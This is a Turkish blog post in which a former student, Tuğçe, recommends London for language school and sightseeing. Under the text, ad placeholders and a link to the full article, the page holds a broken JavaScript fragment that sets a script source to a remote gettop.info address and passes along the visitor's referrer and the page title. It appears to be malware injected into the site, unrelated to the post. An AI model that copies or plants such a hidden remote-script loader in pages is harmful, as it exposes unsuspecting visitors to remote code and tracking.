Buradasınız: Ana sayfa - Genel - Londra’yı bir de Tuğçe’den dinleyin

Londra’yı bir de Tuğçe’den dinleyin

İngilizcenizi gelistirirken, Londra’nin sokaklarinda kaybolmaya ne dersiniz?

tugce tujika londra Londrayı bir de Tuğçeden dinleyin

Merhaba gençler icon smile Londrayı bir de Tuğçeden dinleyin

300x250 reklam kodu buraya Bu yazıyı okuyorsanız belli ki kafanızda hem iyi bir dil eğitimi almak için Londra’da dil okuluna gitmeye, hem de her metrekaresi macera, eğlence ve tarih dolu koca bir şehri ziyaret etmeye niyetiniz var demektir. Öncelikle şunu söyleyeyim Londra dil okulu ve Londra gezi için kesinlikle tılsımlı bir şehir..Özgürlüğünüzü, ruhunuzu kucaklayan ve bir çok ulustan birey barındırması nedeniyle metropolitanlıkta son noktaya gelmiş çılgın bir şehir. Hayatımın en güzel öğrencilik yıllarını geçirdiğim bu şehirden sonra, dünyada bir çok ülke gezmeme rağmen Londra yine de benim için pahabiçilemezdir. Orada yaşadıktan sonra emin olun sizde bana hakvereceksiniz. Yeter ki; yok yağmurludur yok havası kasvetlidir diyerek karşıma gelmeyin:) Niye mi? Çünkü 1 kere bile şemsiye kullanmadım oradayken, yağmurluyken de güzeldi; Thames Nehri’nin kenarında yürürken London Eye’ın şıkır şıkır görüntüsünü izlemek, bir yandan da Houses of Parliament binasının o muazzam dokusuyla büyülenmek ve tam da o anda “rüyada mıyım?” derken Big Ben’in sesiyle irkilmek.. Masal gibi değil mi?

big ben ve houses of parliament Londrayı bir de Tuğçeden dinleyin

300x250 reklam kodu buraya

yazının tamamını okumak için http://www.yurtdisiegitimrehberim.com/ingilizcenizi-gelistirirken-londranin-sokaklarinda-kaybolmaya-ne-dersiniz.html  adresini ziyaret edebilirsiniz.

if (document.currentScript) {

}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Etiketler:, , , , , , , , , , , , , , , , , , , , ,

Comments are closed.